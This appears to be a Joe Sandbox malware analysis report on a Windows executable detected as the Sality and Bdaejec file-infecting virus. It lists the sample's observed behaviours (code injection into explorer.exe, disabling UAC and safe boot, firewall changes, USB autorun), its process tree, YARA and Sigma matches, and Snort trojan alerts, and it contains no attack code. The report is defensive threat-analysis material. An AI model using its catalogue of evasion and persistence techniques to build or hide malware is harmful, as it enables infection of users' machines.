Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe

Overview

General Information

Sample name:#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
renamed because original name is a hash value
Original sample name:.exe
Analysis ID:1467984
MD5:99901509a53dfb9c77c1be4d60763afc
SHA1:920a3553a48d9d11a3b02b61d50bcd564330e173
SHA256:181695ba0cdd4904f94b59450af4022fb811da81f386dca90d439f7c66566c0b
Tags:exesality
Infos:

Detection

Bdaejec, Sality
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Bdaejec
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Infects executable files (exe, dll, sys, html)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file contains section with special chars
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe" MD5: 99901509A53DFB9C77C1BE4D60763AFC)
    • YMZwp.exe (PID: 7348 cmdline: C:\Users\user\AppData\Local\Temp\YMZwp.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 8140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dllhost.exe (PID: 7480 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • ShellExperienceHost.exe (PID: 7716 cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca MD5: 9B8DE9D4EDF68EEF2C1E490ABC291567)
    • RuntimeBroker.exe (PID: 7944 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • sihost.exe (PID: 3400 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
    • svchost.exe (PID: 3452 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • svchost.exe (PID: 3520 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • ctfmon.exe (PID: 3904 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
    • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
    • svchost.exe (PID: 4336 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • StartMenuExperienceHost.exe (PID: 4812 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
    • RuntimeBroker.exe (PID: 4912 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • SearchApp.exe (PID: 5016 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
    • RuntimeBroker.exe (PID: 4472 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • RuntimeBroker.exe (PID: 4852 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • smartscreen.exe (PID: 2780 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
    • ApplicationFrameHost.exe (PID: 6352 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
    • WinStore.App.exe (PID: 6380 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
    • RuntimeBroker.exe (PID: 6676 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • TextInputHost.exe (PID: 6720 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
    • cscript.exe (PID: 5220 cmdline: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus MD5: CB601B41D4C8074BE8A84AED564A94DC)
    • conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SalityF-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.InfectionSality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.PayloadOnce installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
  • Salty Spider
https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\lwkdr.exeINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
C:\Users\user\AppData\Local\Temp\winxmkqo.exeINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_SalityYara detected SalityJoe Security
    Process Memory Space: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe PID: 7248JoeSecurity_SalityYara detected SalityJoe Security
      Process Memory Space: YMZwp.exe PID: 7348JoeSecurity_BdaejecYara detected BdaejecJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.2.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x14:$b1: yrf<[LordPE]
        • 0x210:$b2: Hello world!
        6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a2300.9.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x1b7c:$s1: Simple Poly Engine v
        • 0x14:$b1: yrf<[LordPE]
        • 0x210:$b2: Hello world!
        6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8c79b4.1.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x15648:$b1: yrf<[LordPE]
        • 0x15844:$b2: Hello world!
        6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a25f4.8.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x1888:$s1: Simple Poly Engine v
        6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.872d5c.0.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x6a2a0:$b1: yrf<[LordPE]
        • 0x6a49c:$b2: Hello world!
        Click to see the 3 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe", ParentImage: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ParentProcessId: 7248, ParentProcessName: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3452, ProcessName: svchost.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus, CommandLine: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus, CommandLine|base64offset|contains: )^, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe", ParentImage: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ParentProcessId: 7248, ParentProcessName: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ProcessCommandLine: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus, ProcessId: 5220, ProcessName: cscript.exe
        Sigma detected: Modification of IE Registry Settings
        Source: Registry Key setAuthor: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ProcessId: 7248, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe", ParentImage: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ParentProcessId: 7248, ParentProcessName: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3452, ProcessName: svchost.exe

        Snort Signatures

        Timestamp:07/05/24-08:04:16.384829
        SID:2804830
        Source Port:49976
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:51.047560
        SID:2804830
        Source Port:49859
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:54.453187
        SID:2804830
        Source Port:50028
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:51.747375
        SID:2804830
        Source Port:49942
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:32.879197
        SID:2804830
        Source Port:49999
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:25.220413
        SID:2804830
        Source Port:49826
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:39.035937
        SID:2804830
        Source Port:49924
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:51.583508
        SID:2804830
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:03.711478
        SID:2804830
        Source Port:49958
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:52.362722
        SID:2804830
        Source Port:49861
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:46.533505
        SID:2804830
        Source Port:49774
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:04.888641
        SID:2804830
        Source Port:49877
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:26.499895
        SID:2804830
        Source Port:49906
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:39.967800
        SID:2804830
        Source Port:49845
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:05.876740
        SID:2804830
        Source Port:49720
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:06.282663
        SID:2804830
        Source Port:49801
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:25.842606
        SID:2804830
        Source Port:49747
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:57.813372
        SID:2804830
        Source Port:49951
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:45.423525
        SID:2804830
        Source Port:49773
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:00.800339
        SID:2804830
        Source Port:49872
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:44.518591
        SID:2804830
        Source Port:49932
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:57.875725
        SID:2804830
        Source Port:49868
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:14.294188
        SID:2804830
        Source Port:49732
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:47.224288
        SID:2804830
        Source Port:49854
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:17.747873
        SID:2804830
        Source Port:49895
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:38.826477
        SID:2804830
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:56.777090
        SID:2804830
        Source Port:49949
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:31.979693
        SID:2804830
        Source Port:49914
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:05.322599
        SID:2804830
        Source Port:49960
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:33.421324
        SID:2804830
        Source Port:49836
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:02.715930
        SID:2804830
        Source Port:49714
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:14.125997
        SID:2804830
        Source Port:49890
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:29.008750
        SID:2804830
        Source Port:49910
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:18.587394
        SID:2804830
        Source Port:49737
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:23.272516
        SID:2804830
        Source Port:49985
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:58.079006
        SID:2804830
        Source Port:63852
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:31.374585
        SID:2804830
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:57.315620
        SID:2804830
        Source Port:49950
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:10.377597
        SID:2804830
        Source Port:49967
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:19.199996
        SID:2804830
        Source Port:49980
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:23.091025
        SID:2804830
        Source Port:49903
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:09.815492
        SID:2804830
        Source Port:49725
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:36.104939
        SID:2804830
        Source Port:49840
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:52.115368
        SID:2804830
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:55.289827
        SID:2804830
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:43.101344
        SID:2804830
        Source Port:50012
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:00.378372
        SID:2804830
        Source Port:49711
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:11.864140
        SID:2804830
        Source Port:49809
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:08.435078
        SID:2804830
        Source Port:49882
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:48.306224
        SID:2804830
        Source Port:49937
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:41.070663
        SID:2804830
        Source Port:49846
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:45.078245
        SID:2804830
        Source Port:49933
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:40.542377
        SID:2804830
        Source Port:50008
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:24.133917
        SID:2804830
        Source Port:49825
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:22.240417
        SID:2804830
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:32.368995
        SID:2804830
        Source Port:49998
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:24.084115
        SID:2804830
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:14.638885
        SID:2804830
        Source Port:49891
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:11.102105
        SID:2804830
        Source Port:49886
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:41.600019
        SID:2804830
        Source Port:49928
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:45.687757
        SID:2804830
        Source Port:49852
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:13.749688
        SID:2804830
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:50.293630
        SID:2804830
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:15.390551
        SID:2804830
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:19.716191
        SID:2804830
        Source Port:49738
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:55.807714
        SID:2804830
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:17.677812
        SID:2804830
        Source Port:49816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:46.675224
        SID:2804830
        Source Port:50017
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:00.929388
        SID:2804830
        Source Port:49712
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:29.304615
        SID:2804830
        Source Port:49994
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:25.126569
        SID:2804830
        Source Port:49988
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:36.425758
        SID:2804830
        Source Port:50003
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:43.181784
        SID:2804830
        Source Port:49930
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:22.560088
        SID:2804830
        Source Port:49902
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:37.295683
        SID:2804830
        Source Port:49841
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:41.836037
        SID:2804830
        Source Port:50010
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:23.310866
        SID:2804830
        Source Port:49743
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:37.124711
        SID:2804830
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:07.323810
        SID:2804830
        Source Port:49803
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:09.327857
        SID:2804830
        Source Port:49883
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:41.547579
        SID:2804830
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:30.699932
        SID:2804830
        Source Port:49912
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:01.331912
        SID:2804830
        Source Port:49873
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:54.351124
        SID:2804830
        Source Port:49946
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:45.972513
        SID:2804830
        Source Port:50016
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:44.041870
        SID:2804830
        Source Port:49771
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:36.422487
        SID:2804830
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:08.035151
        SID:2804830
        Source Port:49804
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:13.824450
        SID:2804830
        Source Port:49972
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:30.640342
        SID:2804830
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:18.703803
        SID:2804830
        Source Port:49979
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:51.809341
        SID:2804830
        Source Port:49860
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:06.072074
        SID:2804830
        Source Port:49879
        Destination Port:80
        Protocol:TCP
